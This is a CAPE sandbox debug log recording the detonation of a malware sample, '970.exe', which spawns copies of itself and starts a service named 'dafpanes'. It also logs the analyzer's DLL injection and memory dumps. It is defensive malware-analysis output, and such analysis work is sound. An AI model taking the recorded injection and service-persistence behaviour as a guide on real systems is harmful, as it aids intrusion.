2019-02-11 14:54:51,638 [root] INFO: Announced 64-bit process name: splwow64.exe pid: 2592
2019-02-11 14:54:51,638 [root] INFO: Added new process to list with pid: 2592
2019-02-11 14:54:51,638 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-02-11 14:54:51,654 [lib.api.process] INFO: 64-bit DLL to inject is C:\tsbvpo\dll\KHgFHNG.dll, loader C:\tsbvpo\bin\FYvljThn.exe
2019-02-11 14:54:51,654 [root] DEBUG: set_caller_info: Adding region at 0x00000000002E0000 to caller regions list (advapi32::RegOpenKeyExW).
2019-02-11 14:54:51,654 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2592
2019-02-11 14:54:51,670 [root] DEBUG: set_caller_info: Adding region at 0x0000000002410000 to caller regions list (msvcrt::memcpy).
2019-02-11 14:54:51,670 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-02-11 14:54:51,670 [root] DEBUG: Process dumps enabled.
2019-02-11 14:54:51,686 [root] INFO: Disabling sleep skipping.
2019-02-11 14:54:51,686 [root] WARNING: Unable to place hook on LockResource
2019-02-11 14:54:51,701 [root] WARNING: Unable to hook LockResource
2019-02-11 14:54:51,779 [root] INFO: Process with pid 2228 has terminated
2019-02-11 14:54:51,779 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 2592 at 0x0000000074000000, image base 0x00000000FF1D0000, stack from 0x0000000000155000-0x0000000000160000
2019-02-11 14:54:51,842 [root] DEBUG: Commandline: C:\Windows\splwow64.exe 12288.
2019-02-11 14:54:51,842 [root] INFO: Monitor successfully loaded in process with pid 2592.
2019-02-11 14:54:51,858 [root] DEBUG: DLL loaded at 0x73FF0000: C:\Windows\system32\secur32 (0x8000 bytes).
2019-02-11 14:54:51,858 [root] DEBUG: DLL loaded at 0x000007FEFD000000: C:\Windows\system32\RpcRtRemote (0x14000 bytes).
2019-02-11 14:54:51,858 [root] DEBUG: DLL loaded at 0x000007FEFCCF0000: C:\Windows\system32\secur32 (0xb000 bytes).
2019-02-11 14:54:51,872 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\cryptsp (0x17000 bytes).
2019-02-11 14:54:51,888 [root] DEBUG: DLL loaded at 0x000007FEFC500000: C:\Windows\system32\credssp (0xa000 bytes).
2019-02-11 14:54:51,920 [root] DEBUG: DLL unloaded from 0x000007FEFC8F0000.
2019-02-11 14:54:51,920 [root] DEBUG: DLL unloaded from 0x6A3B0000.
2019-02-11 14:54:51,936 [root] DEBUG: DLL loaded at 0x0000000066830000: C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPOBJS (0x215000 bytes).
2019-02-11 14:54:51,936 [root] DEBUG: DLL loaded at 0x000007FEFC710000: C:\Windows\system32\DNSAPI (0x5b000 bytes).
2019-02-11 14:54:51,950 [root] DEBUG: DLL loaded at 0x000007FEFEE90000: C:\Windows\system32\WS2_32 (0x4d000 bytes).
2019-02-11 14:54:51,950 [root] DEBUG: DLL loaded at 0x000007FEFE2F0000: C:\Windows\system32\NSI (0x8000 bytes).
2019-02-11 14:54:51,950 [root] DEBUG: DLL loaded at 0x000007FEFEDB0000: C:\Windows\system32\OLEAUT32 (0xd7000 bytes).
2019-02-11 14:54:51,997 [root] DEBUG: DLL loaded at 0x000007FEF2C20000: C:\Windows\system32\spool\DRIVERS\x64\3\unidrvui (0xdc000 bytes).
2019-02-11 14:54:52,045 [root] DEBUG: DLL loaded at 0x000007FEFC1C0000: C:\Windows\system32\VERSION (0xc000 bytes).
2019-02-11 14:54:52,045 [root] DEBUG: DLL loaded at 0x661D0000: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Data\1e85062785e286cd9eae9c26d2c61f73\System.Data.ni (0x651000 bytes).
2019-02-11 14:54:52,045 [root] DEBUG: DLL loaded at 0x000007FEFEDB0000: C:\Windows\system32\OLEAUT32 (0xd7000 bytes).
2019-02-11 14:54:52,045 [root] DEBUG: DLL loaded at 0x64E70000: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data (0x2d2000 bytes).
2019-02-11 14:54:52,059 [root] DEBUG: DLL loaded at 0x75D00000: C:\Windows\syswow64\WS2_32 (0x35000 bytes).
2019-02-11 14:54:52,059 [root] DEBUG: DLL loaded at 0x75130000: C:\Windows\syswow64\NSI (0x6000 bytes).
2019-02-11 14:54:52,075 [root] DEBUG: DLL loaded at 0x75790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-02-11 14:54:52,075 [root] DEBUG: DLL loaded at 0x755F0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-02-11 14:54:52,138 [root] DEBUG: DLL loaded at 0x66170000: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit (0x5b000 bytes).
2019-02-11 14:54:52,170 [root] DEBUG: DLL loaded at 0x000007FEF7500000: C:\Windows\system32\spool\DRIVERS\x64\3\SendToOneNoteUI (0x12000 bytes).
2019-02-11 14:54:52,184 [root] DEBUG: DLL unloaded from 0x000007FEF7500000.
2019-02-11 14:54:52,232 [root] DEBUG: DLL unloaded from 0x000007FEF8A20000.
2019-02-11 14:54:52,263 [root] DEBUG: DLL unloaded from 0x000007FEF7500000.
2019-02-11 14:54:52,279 [root] DEBUG: DLL unloaded from 0x000007FEF8A20000.
2019-02-11 14:54:52,309 [root] DEBUG: DLL loaded at 0x000007FEF2B60000: C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdrv (0xb2000 bytes).
2019-02-11 14:54:52,357 [root] DEBUG: DLL unloaded from 0x000007FEF7500000.
2019-02-11 14:54:52,466 [root] DEBUG: DLL loaded at 0x000007FEF74E0000: C:\Windows\system32\FontSub (0x1c000 bytes).
2019-02-11 14:54:52,559 [root] DEBUG: DLL unloaded from 0x000007FEF2C20000.
2019-02-11 14:54:52,559 [root] DEBUG: set_caller_info: Adding region at 0x03D40000 to caller regions list (advapi32::RegOpenKeyExW).
2019-02-11 14:54:52,575 [root] DEBUG: DLL loaded at 0x66050000: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni (0xf1000 bytes).
2019-02-11 14:54:52,575 [root] DEBUG: DLL unloaded from 0x000007FEF7500000.
2019-02-11 14:54:52,575 [root] DEBUG: DLL unloaded from 0x000007FEF8A20000.
2019-02-11 14:54:52,591 [root] DEBUG: DLL unloaded from 0x000007FEF7500000.
2019-02-11 14:54:52,605 [root] DEBUG: DLL unloaded from 0x000007FEF8A20000.
2019-02-11 14:54:52,605 [root] INFO: Stopped Task Scheduler Service
2019-02-11 14:54:52,621 [root] DEBUG: DLL loaded at 0x65FF0000: C:\Windows\system32\rasapi32 (0x52000 bytes).
2019-02-11 14:54:52,621 [root] DEBUG: DLL loaded at 0x73FD0000: C:\Windows\system32\rasman (0x15000 bytes).
2019-02-11 14:54:52,638 [root] DEBUG: DLL loaded at 0x73FB0000: C:\Windows\system32\rtutils (0xd000 bytes).
2019-02-11 14:54:52,638 [root] INFO: Started Task Scheduler Service
2019-02-11 14:54:52,638 [root] DEBUG: DLL loaded at 0x74BF0000: C:\Windows\system32\mswsock (0x3c000 bytes).
2019-02-11 14:54:52,653 [lib.api.process] DEBUG: Using CreateRemoteThread injection.
2019-02-11 14:54:52,653 [root] DEBUG: DLL loaded at 0x74BE0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2019-02-11 14:54:52,653 [root] DEBUG: DLL loaded at 0x73FA0000: C:\Windows\System32\wship6 (0x6000 bytes).
2019-02-11 14:54:52,653 [lib.api.process] INFO: 64-bit DLL to inject is C:\tsbvpo\dll\KHgFHNG.dll, loader C:\tsbvpo\bin\FYvljThn.exe
2019-02-11 14:54:52,653 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-02-11 14:54:52,653 [root] DEBUG: Process dumps enabled.
2019-02-11 14:54:52,668 [root] INFO: Disabling sleep skipping.
2019-02-11 14:54:52,684 [root] WARNING: Unable to place hook on LockResource
2019-02-11 14:54:52,684 [root] WARNING: Unable to hook LockResource
2019-02-11 14:54:52,684 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 816 at 0x0000000074000000, image base 0x00000000FFA10000, stack from 0x0000000001A96000-0x0000000001AA0000
2019-02-11 14:54:52,684 [root] DEBUG: DLL unloaded from 0x73FD0000.
2019-02-11 14:54:52,684 [root] DEBUG: Commandline: C:\Windows\sysnative\svchost.exe -k netsvcs.
2019-02-11 14:54:52,684 [root] DEBUG: DLL loaded at 0x65F90000: C:\Windows\system32\winhttp (0x58000 bytes).
2019-02-11 14:54:52,700 [root] INFO: Added new process to list with pid: 816
2019-02-11 14:54:52,700 [root] DEBUG: DLL loaded at 0x72C70000: C:\Windows\system32\webio (0x4f000 bytes).
2019-02-11 14:54:52,700 [root] INFO: Monitor successfully loaded in process with pid 816.
2019-02-11 14:54:52,700 [root] DEBUG: DLL loaded at 0x73F80000: C:\Windows\system32\IPHLPAPI (0x1c000 bytes).
2019-02-11 14:54:52,700 [root] DEBUG: DLL loaded at 0x73E90000: C:\Windows\system32\WINNSI (0x7000 bytes).
2019-02-11 14:54:52,700 [root] DEBUG: DLL loaded at 0x73E80000: C:\Windows\system32\dhcpcsvc6 (0xd000 bytes).
2019-02-11 14:54:52,700 [root] DEBUG: DLL loaded at 0x73E60000: C:\Windows\system32\dhcpcsvc (0x12000 bytes).
2019-02-11 14:54:52,716 [root] DEBUG: DLL unloaded from 0x772F0000.
2019-02-11 14:54:52,716 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-02-11 14:54:52,716 [root] DEBUG: DLL loaded at 0x73E20000: C:\Windows\system32\credssp (0x8000 bytes).
2019-02-11 14:54:52,716 [root] DEBUG: DLL unloaded from 0x74C70000.
2019-02-11 14:54:52,730 [root] DEBUG: DLL unloaded from 0x000007FEF74E0000.
2019-02-11 14:54:52,746 [root] DEBUG: DLL unloaded from 0x000007FEF7500000.
2019-02-11 14:54:52,746 [root] DEBUG: DLL loaded at 0x74B50000: C:\Windows\system32\DNSAPI (0x44000 bytes).
2019-02-11 14:54:52,778 [root] DEBUG: DLL loaded at 0x000007FEF74C0000: C:\Windows\system32\FontSub (0x1c000 bytes).
2019-02-11 14:54:52,778 [root] DEBUG: DLL loaded at 0x73E10000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2019-02-11 14:54:52,825 [root] DEBUG: DLL unloaded from 0x000007FEF2C20000.
2019-02-11 14:54:52,825 [root] DEBUG: DLL unloaded from 0x000007FEF7500000.
2019-02-11 14:54:52,839 [root] DEBUG: DLL unloaded from 0x000007FEF8A20000.
2019-02-11 14:54:52,839 [root] DEBUG: DLL unloaded from 0x000007FEF7500000.
2019-02-11 14:54:52,855 [root] DEBUG: DLL unloaded from 0x000007FEF8A20000.
2019-02-11 14:54:52,871 [root] DEBUG: DLL unloaded from 0x000007FEF74C0000.
2019-02-11 14:54:52,871 [root] DEBUG: DLL unloaded from 0x000007FEF7500000.
2019-02-11 14:54:52,934 [root] DEBUG: DLL loaded at 0x000007FEF74E0000: C:\Windows\system32\FontSub (0x1c000 bytes).
2019-02-11 14:54:52,964 [root] DEBUG: DLL unloaded from 0x000007FEF2C20000.
2019-02-11 14:54:52,964 [root] DEBUG: DLL unloaded from 0x000007FEF7500000.
2019-02-11 14:54:52,964 [root] DEBUG: DLL unloaded from 0x000007FEF8A20000.
2019-02-11 14:54:52,980 [root] DEBUG: DLL unloaded from 0x000007FEF7500000.
2019-02-11 14:54:52,996 [root] DEBUG: DLL unloaded from 0x000007FEF8A20000.
2019-02-11 14:54:54,665 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2019-02-11 14:54:54,727 [root] DEBUG: DLL loaded at 0x000007FEFB140000: C:\Windows\system32\taskschd (0x127000 bytes).
2019-02-11 14:54:54,868 [root] DEBUG: DLL unloaded from 0x000007FEFB140000.
2019-02-11 14:54:55,601 [root] DEBUG: DLL loaded at 0x65F50000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2019-02-11 14:54:59,984 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-02-11 14:55:00,016 [root] DEBUG: DLL loaded at 0x73E30000: C:\Windows\System32\shdocvw (0x2e000 bytes).
2019-02-11 14:55:00,048 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\SysWOW64\urlmon (0x136000 bytes).
2019-02-11 14:55:00,078 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF9880000 to caller regions list (msvcrt::memcpy).
2019-02-11 14:55:00,125 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFCEF0000 to caller regions list (ntdll::NtCreateFile).
2019-02-11 14:55:00,125 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-02-11 14:55:00,234 [root] DEBUG: DLL loaded at 0x76CA0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-02-11 14:55:00,328 [root] INFO: Announced 32-bit process name: 970.exe pid: 2076
2019-02-11 14:55:00,328 [root] INFO: Added new process to list with pid: 2076
2019-02-11 14:55:00,328 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-02-11 14:55:00,328 [lib.api.process] INFO: 32-bit DLL to inject is C:\tsbvpo\dll\EWdjDWLc.dll, loader C:\tsbvpo\bin\GzFLMqR.exe
2019-02-11 14:55:00,437 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2076
2019-02-11 14:55:00,812 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-02-11 14:55:00,812 [root] DEBUG: Process dumps enabled.
2019-02-11 14:55:00,921 [root] INFO: Disabling sleep skipping.
2019-02-11 14:55:01,029 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2076 at 0x74940000, image base 0x9d0000, stack from 0x466000-0x470000
2019-02-11 14:55:01,029 [root] DEBUG: Commandline: C:\Users\user\Desktop\"C:\Users\user\970.exe".
2019-02-11 14:55:01,124 [root] INFO: Monitor successfully loaded in process with pid 2076.
2019-02-11 14:55:01,154 [root] DEBUG: set_caller_info: Adding region at 0x001A0000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-02-11 14:55:01,233 [root] DEBUG: set_caller_info: Adding region at 0x00210000 to caller regions list (kernel32::CreateToolhelp32Snapshot).
2019-02-11 14:55:01,233 [root] DEBUG: DLL unloaded from 0x009D0000.
2019-02-11 14:55:01,296 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-02-11 14:55:01,296 [root] INFO: Announced 32-bit process name: 970.exe pid: 3032
2019-02-11 14:55:01,296 [root] INFO: Added new process to list with pid: 3032
2019-02-11 14:55:01,296 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-02-11 14:55:01,404 [lib.api.process] INFO: 32-bit DLL to inject is C:\tsbvpo\dll\EWdjDWLc.dll, loader C:\tsbvpo\bin\GzFLMqR.exe
2019-02-11 14:55:01,513 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 3032
2019-02-11 14:55:01,513 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-02-11 14:55:01,622 [root] DEBUG: Process dumps enabled.
2019-02-11 14:55:01,670 [root] INFO: Disabling sleep skipping.
2019-02-11 14:55:01,763 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2708
2019-02-11 14:55:01,763 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 3032 at 0x74940000, image base 0x9d0000, stack from 0x1c6000-0x1d0000
2019-02-11 14:55:01,763 [root] DEBUG: Commandline: C:\Users\user\Desktop\"C:\Users\user\970.exe".
2019-02-11 14:55:01,904 [root] DEBUG: GetHookCallerBase: thread 2920 (handle 0x0), return address 0x21C37249, allocation base 0x21C30000.
2019-02-11 14:55:01,904 [root] INFO: Monitor successfully loaded in process with pid 3032.
2019-02-11 14:55:01,966 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x21C30000.
2019-02-11 14:55:01,966 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x21C30000.
2019-02-11 14:55:02,075 [root] DEBUG: DumpProcess: Module entry point VA is 0x00007363.
2019-02-11 14:55:02,075 [root] DEBUG: set_caller_info: Adding region at 0x000B0000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-02-11 14:55:02,075 [root] DEBUG: set_caller_info: Adding region at 0x00400000 to caller regions list (kernel32::CreateToolhelp32Snapshot).
2019-02-11 14:55:02,168 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2076
2019-02-11 14:55:02,168 [root] INFO: Added new CAPE file to list with path: C:\RTxelpCSMm\CAPE\2708_35152659622352011122019
2019-02-11 14:55:02,168 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x6e800.
2019-02-11 14:55:02,263 [root] DEBUG: GetHookCallerBase: thread 2628 (handle 0x0), return address 0x0021F606, allocation base 0x00210000.
2019-02-11 14:55:02,341 [root] DEBUG: DumpInterestingRegions: Dumping calling region at 0x00210000.
2019-02-11 14:55:02,388 [root] DEBUG: DLL loaded at 0x73E00000: C:\Windows\system32\netutils (0x9000 bytes).
2019-02-11 14:55:02,403 [root] DEBUG: DLL unloaded from 0x74110000.
2019-02-11 14:55:02,434 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00210000.
2019-02-11 14:55:02,480 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000F5E0.
2019-02-11 14:55:02,480 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-02-11 14:55:02,528 [root] DEBUG: DLL unloaded from 0x693B0000.
2019-02-11 14:55:02,575 [root] INFO: Added new CAPE file to list with path: C:\RTxelpCSMm\CAPE\2076_14148700162352011122019
2019-02-11 14:55:02,575 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x14200.
2019-02-11 14:55:02,653 [root] DEBUG: DLL unloaded from 0x73CA0000.
2019-02-11 14:55:02,653 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x009D0000.
2019-02-11 14:55:02,653 [root] DEBUG: DLL unloaded from 0x75140000.
2019-02-11 14:55:02,653 [root] DEBUG: DLL unloaded from 0x74870000.
2019-02-11 14:55:02,746 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x009D0000.
2019-02-11 14:55:02,746 [root] DEBUG: DLL unloaded from 0x73E20000.
2019-02-11 14:55:02,746 [root] DEBUG: DumpProcess: Module entry point VA is 0x00012EBE.
2019-02-11 14:55:02,746 [root] INFO: Added new CAPE file to list with path: C:\RTxelpCSMm\CAPE\2076_5932235182352011122019
2019-02-11 14:55:02,855 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x72e00.
2019-02-11 14:55:02,855 [root] INFO: Notified of termination of process with pid 2708.
2019-02-11 14:55:02,855 [root] DEBUG: DLL unloaded from 0x75140000.
2019-02-11 14:55:03,012 [root] INFO: Notified of termination of process with pid 2076.
2019-02-11 14:55:03,230 [root] DEBUG: set_caller_info: Adding region at 0x0000000002E10000 to caller regions list (msvcrt::memcpy).
2019-02-11 14:55:03,230 [root] INFO: Process with pid 2708 has terminated
2019-02-11 14:55:03,292 [root] INFO: Process with pid 2076 has terminated
2019-02-11 14:55:03,869 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF90B0000 to caller regions list (ntdll::NtWaitForSingleObject).
2019-02-11 14:55:04,884 [root] DEBUG: DLL unloaded from 0x751B0000.
2019-02-11 14:55:07,269 [root] DEBUG: DLL loaded at 0x75E70000: C:\Windows\syswow64\shell32 (0xc4a000 bytes).
2019-02-11 14:55:07,348 [root] DEBUG: DLL loaded at 0x743A0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-02-11 14:55:07,426 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-02-11 14:55:07,426 [root] DEBUG: DLL loaded at 0x74110000: C:\Windows\system32\propsys (0xf5000 bytes).
2019-02-11 14:55:07,503 [root] DEBUG: DLL loaded at 0x74870000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-02-11 14:55:07,503 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-02-11 14:55:07,566 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-02-11 14:55:07,566 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-02-11 14:55:07,644 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-02-11 14:55:07,660 [root] DEBUG: DLL unloaded from 0x75E70000.
2019-02-11 14:55:08,424 [root] DEBUG: set_caller_info: Adding region at 0x00000000022F0000 to caller regions list (msvcrt::memcpy).
2019-02-11 14:55:09,049 [root] DEBUG: DLL unloaded from 0x0000000066830000.
2019-02-11 14:55:09,063 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\SETUPAPI (0x1d7000 bytes).
2019-02-11 14:55:09,063 [root] DEBUG: DLL loaded at 0x000007FEFD1B0000: C:\Windows\system32\CFGMGR32 (0x36000 bytes).
2019-02-11 14:55:09,063 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2019-02-11 14:55:09,095 [root] DEBUG: set_caller_info: Adding region at 0x0000000002270000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-02-11 14:55:09,127 [root] DEBUG: DLL loaded at 0x000007FEFD360000: C:\Windows\system32\WINTRUST (0x3a000 bytes).
2019-02-11 14:55:09,127 [root] DEBUG: DLL loaded at 0x000007FEFD1F0000: C:\Windows\system32\CRYPT32 (0x167000 bytes).
2019-02-11 14:55:09,127 [root] DEBUG: DLL loaded at 0x000007FEFD100000: C:\Windows\system32\MSASN1 (0xf000 bytes).
2019-02-11 14:55:09,141 [root] DEBUG: set_caller_info: Adding region at 0x0000000000140000 to caller regions list (setupapi::SetupDiGetClassDevsW).
2019-02-11 14:55:12,230 [root] DEBUG: DLL unloaded from 0x000007FEFE8C0000.
2019-02-11 14:55:14,851 [root] DEBUG: set_caller_info: Adding region at 0x0000000003810000 to caller regions list (msvcrt::memcpy).
2019-02-11 14:55:14,946 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF80F0000 to caller regions list (msvcrt::memcpy).
2019-02-11 14:55:15,085 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF45C0000 to caller regions list (ntdll::NtDuplicateObject).
2019-02-11 14:55:16,302 [root] DEBUG: set_caller_info: Adding region at 0x0000000003410000 to caller regions list (msvcrt::memcpy).
2019-02-11 14:55:17,191 [root] DEBUG: DLL unloaded from 0x74110000.
2019-02-11 14:55:17,191 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-02-11 14:55:17,253 [root] DEBUG: DLL loaded at 0x74C30000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-02-11 14:55:17,253 [root] DEBUG: DLL loaded at 0x747F0000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2019-02-11 14:55:17,301 [root] DEBUG: DLL loaded at 0x74820000: C:\Windows\system32\mssprxy (0xc000 bytes).
2019-02-11 14:55:23,010 [root] DEBUG: DLL unloaded from 0x75C10000.
2019-02-11 14:55:37,065 [root] DEBUG: DLL unloaded from 0x000007FEFD430000.
2019-02-11 14:55:37,098 [root] DEBUG: set_caller_info: Adding region at 0x0000000000030000 to caller regions list (msvcrt::memcpy).
2019-02-11 14:55:40,062 [root] DEBUG: DLL unloaded from 0x74820000.
2019-02-11 14:55:40,062 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF4500000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2019-02-11 14:55:40,076 [root] DEBUG: DLL unloaded from 0x751B0000.
2019-02-11 14:55:40,092 [root] INFO: Announced starting service "dafpanes"
2019-02-11 14:55:40,108 [root] DEBUG: DLL unloaded from 0x75E70000.
2019-02-11 14:55:46,191 [root] INFO: Announced 32-bit process name: dafpanes.exe pid: 2156
2019-02-11 14:55:46,191 [root] INFO: Added new process to list with pid: 2156
2019-02-11 14:55:46,191 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-02-11 14:55:46,191 [root] DEBUG: DLL unloaded from 0x000007FEF45C0000.
2019-02-11 14:55:48,329 [root] DEBUG: DLL unloaded from 0x000007FEF9950000.
2019-02-11 14:55:48,345 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-02-11 14:55:48,345 [lib.api.process] INFO: 32-bit DLL to inject is C:\tsbvpo\dll\EWdjDWLc.dll, loader C:\tsbvpo\bin\GzFLMqR.exe
2019-02-11 14:55:48,361 [root] DEBUG: DLL unloaded from 0x000007FEF9540000.
2019-02-11 14:55:48,407 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2156
2019-02-11 14:55:48,438 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF97C0000 to caller regions list (msvcrt::memcpy).
2019-02-11 14:55:48,470 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF9A00000 to caller regions list (msvcrt::memcpy).
2019-02-11 14:55:48,641 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-02-11 14:55:48,734 [root] DEBUG: Process dumps enabled.
2019-02-11 14:55:48,750 [root] DEBUG: DLL unloaded from 0x000007FEFA1C0000.
2019-02-11 14:55:59,421 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF4AD0000 to caller regions list (advapi32::RegNotifyChangeKeyValue).
2019-02-11 14:55:59,874 [root] INFO: Disabling sleep skipping.
2019-02-11 14:55:59,888 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF4AF0000 to caller regions list (advapi32::OpenSCManagerW).
2019-02-11 14:55:59,888 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF8070000 to caller regions list (msvcrt::memcpy).
2019-02-11 14:55:59,951 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2156 at 0x74940000, image base 0x9d0000, stack from 0x3a6000-0x3b0000
2019-02-11 14:56:00,013 [modules.auxiliary.human] INFO: Issuing keypress on Office dialog
2019-02-11 14:56:00,061 [root] DEBUG: Commandline: C:\Windows\System32\"C:\Windows\SysWOW64\dafpanes.exe".
2019-02-11 14:56:00,186 [root] DEBUG: DLL loaded at 0x75D00000: C:\Windows\syswow64\ws2_32 (0x35000 bytes).
2019-02-11 14:56:00,279 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF94D0000 to caller regions list (msvcrt::memcpy).
2019-02-11 14:56:00,295 [root] INFO: Monitor successfully loaded in process with pid 2156.
2019-02-11 14:56:00,295 [root] DEBUG: DLL loaded at 0x75130000: C:\Windows\syswow64\NSI (0x6000 bytes).
2019-02-11 14:56:00,357 [root] DEBUG: set_caller_info: Adding region at 0x003B0000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-02-11 14:56:00,434 [root] DEBUG: DLL loaded at 0x74B50000: C:\Windows\system32\dnsapi (0x44000 bytes).
2019-02-11 14:56:00,450 [root] DEBUG: set_caller_info: Adding region at 0x00420000 to caller regions list (kernel32::CreateToolhelp32Snapshot).
2019-02-11 14:56:00,513 [root] DEBUG: DLL unloaded from 0x009D0000.
2019-02-11 14:56:01,746 [root] DEBUG: DLL loaded at 0x74340000: C:\Windows\system32\iphlpapi (0x1c000 bytes).
2019-02-11 14:56:01,746 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-02-11 14:56:01,746 [root] DEBUG: DLL loaded at 0x74330000: C:\Windows\system32\WINNSI (0x7000 bytes).
2019-02-11 14:56:01,760 [root] DEBUG: DLL loaded at 0x74220000: C:\Windows\system32\RASAPI32 (0x52000 bytes).
2019-02-11 14:56:01,760 [root] INFO: Announced 32-bit process name: dafpanes.exe pid: 1500
2019-02-11 14:56:01,760 [root] INFO: Added new process to list with pid: 1500
2019-02-11 14:56:01,760 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-02-11 14:56:01,760 [root] DEBUG: DLL loaded at 0x740F0000: C:\Windows\system32\rasman (0x15000 bytes).
2019-02-11 14:56:01,760 [lib.api.process] INFO: 32-bit DLL to inject is C:\tsbvpo\dll\EWdjDWLc.dll, loader C:\tsbvpo\bin\GzFLMqR.exe
2019-02-11 14:56:01,776 [root] DEBUG: DLL loaded at 0x74210000: C:\Windows\system32\rtutils (0xd000 bytes).
2019-02-11 14:56:01,776 [root] DEBUG: DLL unloaded from 0x74220000.
2019-02-11 14:56:01,792 [root] DEBUG: DLL loaded at 0x740E0000: C:\Windows\system32\sensapi (0x6000 bytes).
2019-02-11 14:56:01,808 [root] DEBUG: DLL unloaded from 0x75600000.
2019-02-11 14:56:01,838 [modules.auxiliary.human] INFO: Issuing keypress on Office dialog
2019-02-11 14:56:01,855 [root] DEBUG: DLL unloaded from 0x740F0000.
2019-02-11 14:56:01,869 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1500
2019-02-11 14:56:01,994 [root] DEBUG: DLL unloaded from 0x751B0000.
2019-02-11 14:56:01,994 [root] DEBUG: DLL loaded at 0x73AE0000: C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPCEXT (0x194000 bytes).
2019-02-11 14:56:02,026 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-02-11 14:56:02,135 [root] DEBUG: DLL loaded at 0x73F90000: C:\Windows\system32\WinSCard (0x23000 bytes).
